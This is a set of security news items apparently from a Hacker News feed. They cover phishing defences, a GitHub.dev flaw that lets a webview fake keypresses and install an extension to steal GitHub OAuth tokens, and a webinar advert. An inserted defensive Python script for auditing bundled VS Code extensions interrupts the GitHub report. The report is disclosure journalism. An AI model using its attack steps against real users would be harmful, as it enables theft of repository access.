"This is a strong reminder of why defence in depth matters," Huntress said. "Configuring a Group Policy Object (GPO) in Active Directory to force script files such as .vbs, .hta, and .js to open in Notepad by default can stop a threat actor at the very first stage, preventing additional payloads from ever being dropped."

"On the email security front, organizations should consider deploying DMARC, DKIM, and SPF records to reduce the likelihood of spoofed or malicious emails reaching end users. Beyond that, an email gateway solution capable of sandboxing attachments and links before delivery adds another meaningful layer of protection."



from The Hacker News https://ift.tt/278XJcY

One-Click GitHub Dev Attack Lets Attackers Steal Full GitHub OAuth Tokens

Cybersecurity researchers have disclosed a one-click attack via Microsoft Visual Studio Code (VS Code) that makes it possible to steal a user's GitHub token.

"Just by clicking a link, it's possible for an attacker to steal a GitHub token that can read and write to your repos, including private ones," security researcher Ammar Askar said.

GitHub supports a feature called GitHub.dev that runs as a lightweight web-based source code editor in the web browser's sandbox by launching a VS Code environment. It allows users to send pull requests and make commits.

"This functionality is achieved by github.com POSTing over an OAuth token to github.dev that allows it to interact with GitHub on your behalf," Askar said. "The token is not scoped to the particular repo you interacted with, meaning it has full access to every other repo that you have access to."

In a nutshell, the vulnerability allows attackers to install malicious VS Code extensions that steal GitHub OAuth tokens when they are passed to GitHub.dev by exploiting a message-passing mechanism between the main VS Code window and webviews. Webviews are used to render Markdown previews or edit Jupyter notebooks.

Specifically, the exploit runs malicious JavaScript inside an untrusted webview to simulate keypresses (aka keydown events) in the main editor window, open the Command Palette by triggering "Ctrl+Shift+P," and install an attacker-controlled extension that extracts the GitHub OAuth token sent to GitHub.dev and queries the GitHub API to enumerate all private repositories the victim can access.

It's worth noting the approach also leverages a VS Code feature called local workspace extensions that allows an extension to be directly installed without presenting any additional trust dialog prompt as long as it's placed in the ".vscode/extensions" folder within that workspace, effectively bypassing the publisher trust check.
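Because the bypass depends on an extension sitting in ".vscode/extensions" inside the workspace, a repository audit can list such bundled extensions and the keybindings their manifests contribute before anyone opens the repo in an editor. This is an added example, not the researcher's or Microsoft's code; the sample extension, key and command name are hypothetical.

```python
import json
import tempfile
from pathlib import Path


def audit_workspace_extensions(repo_root):
    """List extensions bundled under .vscode/extensions and the keybindings they contribute."""
    findings = []
    for manifest in sorted(Path(repo_root).glob("**/.vscode/extensions/*/package.json")):
        entry = {"path": manifest.relative_to(repo_root).as_posix()}
        try:
            pkg = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError) as exc:  # unreadable or malformed manifest
            entry["error"] = str(exc)
            findings.append(entry)
            continue
        if not isinstance(pkg, dict):
            pkg = {}
        contributes = pkg.get("contributes") or {}
        bindings = contributes.get("keybindings") or [] if isinstance(contributes, dict) else []
        if isinstance(bindings, dict):  # tolerate a single object instead of a list
            bindings = [bindings]
        entry["name"] = pkg.get("name")
        entry["keybindings"] = [(b.get("key"), b.get("command"))
                                for b in bindings if isinstance(b, dict)]
        findings.append(entry)
    return findings


def make_constructed_repo():
    """Build a throwaway repo with one bundled extension (all names are hypothetical)."""
    root = Path(tempfile.mkdtemp())
    ext = root / ".vscode" / "extensions" / "example-ext"
    ext.mkdir(parents=True)
    (ext / "package.json").write_text(json.dumps({
        "name": "example-ext",
        "contributes": {"keybindings": [
            {"key": "ctrl+alt+x", "command": "example.hypotheticalCommand"}]},
    }), encoding="utf-8")
    (root / "README.md").write_text("constructed sample\n", encoding="utf-8")
    return root


if __name__ == "__main__":
    for finding in audit_workspace_extensions(make_constructed_repo()):
        print(finding)
```

Run against a clone before opening it, any hit is worth a manual look, since most repositories have no reason to ship an extension inside the workspace folder.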

"This is just a small hiccup though, one of the things that extensions can do as part of their package.json is to contribute extra keybindings to VS Code," the researcher explained. "Since we can reliably trigger keybindings, we can just add a keybind for whatever VS Code command we want, such as installing an extension while skipping the trusted publisher check."

The researcher also noted that GitHub was notified of the vulnerability on June 2, 2026, and that details of the issue were made public an hour later, citing Microsoft's handling of VS Code-related bugs in the past. As of writing, Microsoft has acknowledged the vulnerability and noted that it's working on a fix.

"To clarify, this issue does not affect VS Code Desktop," Alexandru Dima, a partner software engineering manager at Microsoft, said.



from The Hacker News https://ift.tt/jL6rAFp

Beyond the Zero-Day: See Your Network Like an Attacker | Webinar with HD Moore

Assume the breach. Zero-days keep shipping, AI is writing exploits faster than anyone patches, and "patch everything in time" stopped working years ago. Stop betting the org on winning that race. You don't control which bug lands. You control what it can reach once it does.

That is a question about the shape of your network, and most teams have the shape wrong. HD Moore, creator of Metasploit and now CEO of runZero, spends the session showing you that shape from the attacker's side.

Save your seat for a LIVE session, or register, and we will send you the recording.

The segmentation you think you have

The comfortable assumption: critical systems sit behind a firewall or off on their own segment, so a foothold over here cannot become a disaster over there. Call it the segmentation illusion. It holds until someone maps the network for real.

Then the seams show up. A device wired into two networks at once, quietly bridging the zones you meant to keep apart. Connected gear nobody registered, answering on a segment it should not be on. Whole sets of machines hiding behind an industrial protocol gateway, invisible to your scanner, reachable by anyone who knows the gateway is there. None of it is on the asset list. All of it routes around the control you were counting on.

Inventory is a list. Attackers read a map.

You keep an inventory, a static list of things you own. An attacker does not care about your list. They care about paths: how one foothold reaches the next, until it lands on something that hurts. The two views rarely match, and the difference is exactly the part of your network you cannot see and they can. Moore built Metasploit, the framework half the industry learned offense on, and now runs the company whose whole job is finding the assets and connections organizations don't know they have.

Grab your spot and see that view turned on your own environment.

What you leave able to do

  • Find the assets you don't know you have. Unsanctioned IT, shadow IoT, and the sub-assets behind OT protocol gateways where your scans never look.
  • Find the bridges that break segmentation. The multi-homed devices and forgotten assets connecting zones you believed were isolated.
  • See the paths, not just the parts. Trade static inventory for live attack-path mapping that shows how a foothold actually travels.
  • Fix the few things that matter. Focus remediation on the assets and links that shorten an attacker's route to impact.

Corporate network, factory floor, or both tangled together: if IT, IoT, and OT share your environment, the seams between them are where this goes wrong. See your network the way an attacker already does, before they do.

Register now. Can't make it live? Sign up anyway, and we will send the recording.

This article is a contributed piece from one of our valued partners.



from The Hacker News https://ift.tt/MsQ5lhu